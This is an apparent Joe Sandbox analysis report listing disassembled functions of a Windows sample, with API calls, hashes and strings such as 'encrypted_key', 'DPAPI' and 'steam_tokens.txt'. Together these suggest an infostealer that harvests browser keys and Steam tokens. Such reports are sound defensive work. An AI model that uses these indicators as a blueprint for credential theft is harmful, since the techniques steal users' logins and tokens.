                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                        • String ID:
                        • API String ID: 174687898-0
                        • Opcode ID: e5a8d0b8144b521ab4a8d514f3e45f4d228c88946224b96dc74b612e47ffe619
                        • Instruction ID: eb5f445a8d6a8238a03cb3c233a7db4f76eee644542ca357ae0a5eed87f88482
                        • Opcode Fuzzy Hash: e5a8d0b8144b521ab4a8d514f3e45f4d228c88946224b96dc74b612e47ffe619
                        • Instruction Fuzzy Hash: A8418D717046069BEB20CF69DC84BAAB3E9FB88305F1445AAEC4DC7340E735E941DB64
                        Function 0045D7B0 Relevance: 9.1, APIs: 6, Instructions: 127registrystringCOMMON
                        Download Yara Rule
                        APIs
                        • memset.MSVCRT ref: 0045D7D6
                        • RegOpenKeyExA.ADVAPI32(80000001,0158DAB0,00000000,00020119,?), ref: 0045D7F5
                        • RegQueryValueExA.ADVAPI32(?,0158E400,00000000,00000000,00000000,000000FF), ref: 0045D819
                        • RegCloseKey.ADVAPI32(?), ref: 0045D823
                        • lstrcat.KERNEL32(?,00000000), ref: 0045D848
                        • lstrcat.KERNEL32(?,0158E4C0), ref: 0045D85C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$CloseOpenQueryValuememset
                        • String ID:
                        • API String ID: 2623679115-0
                        • Opcode ID: a320a8111bf2741256d16c488fc3cb4bd71912493e5aaad4424e9486cab1ce09
                        • Instruction ID: 208eee261c82ef8895694925ba8617464544410a4eb19c04ffbe62566bd7bc26
                        • Opcode Fuzzy Hash: a320a8111bf2741256d16c488fc3cb4bd71912493e5aaad4424e9486cab1ce09
                        • Instruction Fuzzy Hash: 6D417371A1010CAFDB58EF64EC86ADE7775AF44308F404069B90D97251EE34AEC98F95
                        Function 00449C70 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 124memorystringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000), ref: 00449CA8
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00449CDA
                        • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00449D03
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocLocallstrcpy
                        • String ID: $"encrypted_key":"$DPAPI
                        • API String ID: 2746078483-738592651
                        • Opcode ID: d3e20cfdbbeaf55dcedb6708a29ea1142034a85dd4e6f7419ca04d5d1e0b8acf
                        • Instruction ID: 783b70ee2c6ae2c0b4c183280606c0e0eb2985ede7cda610fc8dab915b1a8e52
                        • Opcode Fuzzy Hash: d3e20cfdbbeaf55dcedb6708a29ea1142034a85dd4e6f7419ca04d5d1e0b8acf
                        • Instruction Fuzzy Hash: 2D41D071E006099BEB21EF65DD856AFB7B4AF44308F04406AFD15A7352EA78ED00C798
                        Function 0045E9E0 Relevance: 9.1, APIs: 6, Instructions: 110stringCOMMON
                        Download Yara Rule
                        APIs
                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0045EA24
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045EA53
                        • lstrcat.KERNEL32(?,00000000), ref: 0045EA61
                        • lstrcat.KERNEL32(?,00471794), ref: 0045EA7A
                        • lstrcat.KERNEL32(?,01589268), ref: 0045EA8D
                        • lstrcat.KERNEL32(?,00471794), ref: 0045EA9F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FolderPathlstrcpy
                        • String ID:
                        • API String ID: 818526691-0
                        • Opcode ID: a9213c00813d909cb68aa6f64ced00dc588fb9b5854e59b9ce215fadeefdff2c
                        • Instruction ID: d83bbb6aeeac9feb991bff8e8bd546cef28032ce5fe76f52713d4fe26bc0e852
                        • Opcode Fuzzy Hash: a9213c00813d909cb68aa6f64ced00dc588fb9b5854e59b9ce215fadeefdff2c
                        • Instruction Fuzzy Hash: D341E671A10118AFDB19EB64DC42FED73B5BF48300F4044ADBA1AA7351DE749E848F64
                        Function 0045ECB0 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0045ECDF
                        • lstrlen.KERNEL32(00000000), ref: 0045ECF6
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045ED1D
                        • lstrlen.KERNEL32(00000000), ref: 0045ED24
                        • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 0045ED52
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen
                        • String ID: steam_tokens.txt
                        • API String ID: 367037083-401951677
                        • Opcode ID: b7018f040ee37ee35448969189da786273f5a5547ab20a180c1fca5596fbba62
                        • Instruction ID: cbe0a42d3d937258b2b4b8acbb252e05b094658d706eaf40eb68cdbb98bf4ce3
                        • Opcode Fuzzy Hash: b7018f040ee37ee35448969189da786273f5a5547ab20a180c1fca5596fbba62
                        • Instruction Fuzzy Hash: D631A131B101055BE726BB3AED4A95FB7A4AF40305F401026FC45DB312DB6CDD0947A9
                        Function 00449A80 Relevance: 9.1, APIs: 6, Instructions: 67filememoryCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,0044140E), ref: 00449A9A
                        • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,0044140E), ref: 00449AB0
                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,0044140E), ref: 00449AC7
                        • ReadFile.KERNEL32(00000000,00000000,?,0044140E,00000000,?,?,?,0044140E), ref: 00449AE0
                        • LocalFree.KERNEL32(?,?,?,?,0044140E), ref: 00449B00
                        • CloseHandle.KERNEL32(00000000,?,?,?,0044140E), ref: 00449B07
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                        • String ID:
                        • API String ID: 2311089104-0
                        • Opcode ID: ec3f5971b388e3d5eaf0cca334cb827e63731d59930deb535142f169941a483b
                        • Instruction ID: e7a6ff630ddd9f2379d546ec6ac574673d6c3654a4acaa9288def0cb164f347f
                        • Opcode Fuzzy Hash: ec3f5971b388e3d5eaf0cca334cb827e63731d59930deb535142f169941a483b
                        • Instruction Fuzzy Hash: EB115E71600209AFE710DFA9DD88EAB73BDFB04340F10015AF905A7280EB78AD40CBA5
                        Function 00465AD0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 135COMMON
                        Download Yara Rule
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 00465B14
                          • Part of subcall function 0046A173: std::exception::exception.LIBCMT ref: 0046A188
                          • Part of subcall function 0046A173: std::exception::exception.LIBCMT ref: 0046A1AE
                        • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00465B7C
                        • memmove.MSVCRT(00000000,?,?), ref: 00465B89
                        • memmove.MSVCRT(00000000,?,?), ref: 00465B98
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                        • String ID: vector<T> too long
                        • API String ID: 2052693487-3788999226
                        • Opcode ID: e3e96f4011864833c1aeede3f94dbf2919798ed6ead8e95162d698ca9575863f
                        • Instruction ID: 87124a48c6a07434a9e9154e526a6bc69b811c52ecf0d36bab6a07e356590a79
                        • Opcode Fuzzy Hash: e3e96f4011864833c1aeede3f94dbf2919798ed6ead8e95162d698ca9575863f
                        • Instruction Fuzzy Hash: 84419271B005199FCF18DF6CC991AAEBBF5EB89710F14822AE909E7344E634ED00CB95
                        Function 004690DD Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: String___crt$Typememset
                        • String ID:
                        • API String ID: 3530896902-3916222277
                        • Opcode ID: a9da2648693fce3585fa4a49c652317d3d6ce4b2a28aca028189ca78fed75925
                        • Instruction ID: f849c9c40b70f01321f7a974e744239d5f48a9a15caf74ba82a0085a692a04ca
                        • Opcode Fuzzy Hash: a9da2648693fce3585fa4a49c652317d3d6ce4b2a28aca028189ca78fed75925
                        • Instruction Fuzzy Hash: 084128B050074CAEDB218B24CD94FFB7BFC9B46704F1448E9E98686182F2B59E458F29
                        Function 00457D40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94COMMON
                        Download Yara Rule
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 00457D58
                          • Part of subcall function 0046A1C0: std::exception::exception.LIBCMT ref: 0046A1D5
                          • Part of subcall function 0046A1C0: std::exception::exception.LIBCMT ref: 0046A1FB
                        • std::_Xinvalid_argument.LIBCPMT ref: 00457D76
                        • std::_Xinvalid_argument.LIBCPMT ref: 00457D91
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Xinvalid_argumentstd::_$std::exception::exception
                        • String ID: invalid string position$string too long
                        • API String ID: 3310641104-4289949731
                        • Opcode ID: 2a4b1c18a1fc3777be1211ac036b2346daf995b061a2efc151ce30c4695118eb
                        • Instruction ID: 5e7957435e389a1c103b317113ecaa0cf71808f8e5e11107f00d7a0c465f64d0
                        • Opcode Fuzzy Hash: 2a4b1c18a1fc3777be1211ac036b2346daf995b061a2efc151ce30c4695118eb
                        • Instruction Fuzzy Hash: FE21D2323047004BD720DE6CE881A7AF7E5EF92755B204A3FE8468B342D779DC0887A9
                        Function 004633C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004633EF
                        • RtlAllocateHeap.NTDLL(00000000), ref: 004633F6
                        • GlobalMemoryStatusEx.KERNEL32 ref: 00463411
                        • wsprintfA.USER32 ref: 00463437
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                        • String ID: %d MB
                        • API String ID: 2922868504-2651807785
                        • Opcode ID: f52ff5b10ed559d971aceb7f1c52a2f8aee0ca08e4379ab007b319c70a63275a
                        • Instruction ID: f09529127b19022020cbe0a24f32aa0559a97ab85262aa1563105776fc8a0b55
                        • Opcode Fuzzy Hash: f52ff5b10ed559d971aceb7f1c52a2f8aee0ca08e4379ab007b319c70a63275a
                        • Instruction Fuzzy Hash: 43012DB1A00244AFD704DF98CC45F6EB7B9FB44711F00012AF906E7380D7785D0086A6
